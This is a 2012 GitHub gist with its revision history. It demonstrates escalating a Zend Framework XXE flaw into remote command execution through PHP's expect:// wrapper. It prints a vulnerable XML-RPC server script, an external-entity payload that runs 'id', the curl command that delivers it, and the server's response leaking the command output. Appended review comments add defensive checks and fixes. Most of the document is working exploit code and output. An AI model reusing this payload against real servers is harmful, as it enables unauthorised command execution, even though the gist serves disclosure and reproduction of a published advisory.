@joernchen
Created September 4, 2012 17:34

Revisions

  1. joernchen revised this gist Sep 4, 2012. 1 changed file with 5 additions and 2 deletions.
    7 changes: 5 additions & 2 deletions gistfile1.txt
    @@ -19,5 +19,8 @@ joern@vbox-1:/tmp$ cat payload
    </methodCall>
    joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload
    <?xml version="1.0" encoding="UTF-8"?>
    <methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value><string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
    &quot; does not exist</string></value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$
    <methodResponse>
    <fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value>
    <string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
    &quot; does not exist</string>
    </value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$
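Review bot: The five added lines duplicate the two removed lines directly above them, differing only in hand-inserted line breaks inside the `<methodResponse>`; the server returned the response on a single line (in both versions the prompt `joern@vbox-1:/tmp$` is fused to `</methodResponse>`, so there is not even a trailing newline), so either mark the wrapped copy as reformatted for readability or drop the single-line capture, otherwise a reader will take the wrapped form as literal output. The part worth keeping in either form is `faultCode` 620 with `faultString` `Method "uid=33(www-data) ..." does not exist`: it shows the server echoing the expanded entity back in its own error, which is also the signal a defender can alert on (XML-RPC faults whose quoted method name is something other than a method identifier).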
  2. joernchen created this gist Sep 4, 2012.
    23 changes: 23 additions & 0 deletions gistfile1.txt
    @@ -0,0 +1,23 @@
    This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
    into a Remote Command Execution:

    NOTE: It relies on the PHP expect module being loaded
    (see http://de.php.net/manual/en/book.expect.php)

    joern@vbox-1:/tmp$ cat /var/www/server.php
    <?
    require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
    Zend_Loader_Autoloader::getInstance();
    $server = new Zend_XmlRpc_Server();
    echo $server->handle();

    ?>
    joern@vbox-1:/tmp$ cat payload
    <!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
    <methodCall>
    <methodName>&foo;</methodName>
    </methodCall>
    joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload
    <?xml version="1.0" encoding="UTF-8"?>
    <methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value><string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
    &quot; does not exist</string></value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$
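Review bot: `server.php` opens with the short tag `<?` (the line after `cat /var/www/server.php`), which only parses when `short_open_tag` is enabled; use `<?php` so the reproducer works on a default configuration. The NOTE about the `expect` module should also state the check and the fix from the defending side: `expect` is a PECL extension that is not compiled into PHP by default, so `php -m | grep expect` tells an administrator whether this escalation from the XXE in the linked SEC Consult advisory applies at all, and the XXE is what has to be fixed (the patched Zend Framework referenced by the advisory, or calling `libxml_disable_entity_loader(true)` before any untrusted XML is parsed), not merely the removal of `expect`.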